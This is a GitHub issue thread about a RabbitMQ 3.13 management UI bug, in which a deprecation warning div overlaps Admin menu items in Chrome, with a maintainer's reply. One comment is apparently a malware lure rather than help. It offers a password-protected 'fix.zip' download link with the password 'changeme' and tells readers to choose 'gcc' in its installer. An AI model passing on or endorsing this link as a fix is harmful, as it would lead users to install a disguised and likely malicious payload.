### ISSUE TITLE
UI: 'Deprecated features are being used' div element overlap items in Admin

### ISSUE THREAD

**Issue by pavigor** [rabbitmq/rabbitmq-server#12139]
### Describe the bug

After upgrading to 3.13 I see warning in UI 

> Deprecated features are being used. [[Learn more]](https://www.rabbitmq.com/feature-flags.html)

This div element overlap first two items in Admin (Users, Virtual Hosts)

Reproduced only in Chrome (Version 128.0.6613.84 (Official Build) (64-bit)), Firefox works fine.

![image](https://github.com/user-attachments/assets/1ca5726e-8fbe-4bed-8fcd-16fc67a35424)

### Reproduction steps

1. Open UI in Chrome browser and go to Admin
2. See overlaps
3. Right click on the warn element, next click to Inspect
4. Find div el with id `warnings`
![image](https://github.com/user-attachments/assets/9fa50873-0e12-48ab-9235-39e0a7789bbb)

5. Click on it and select Delete element
6. You will see overlaped items - Users, Virtual Hosts

### Expected behavior

Warn element shoudn't overlap other elements in UI

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by michaelklishin** [comment]
If someone wants to improve this (I don't know what exactly is expected), you are welcome to contribute it.

I do not observe this on the screens I use, and seemingly no one else on the core team does. Our small team has much more important things to work on.
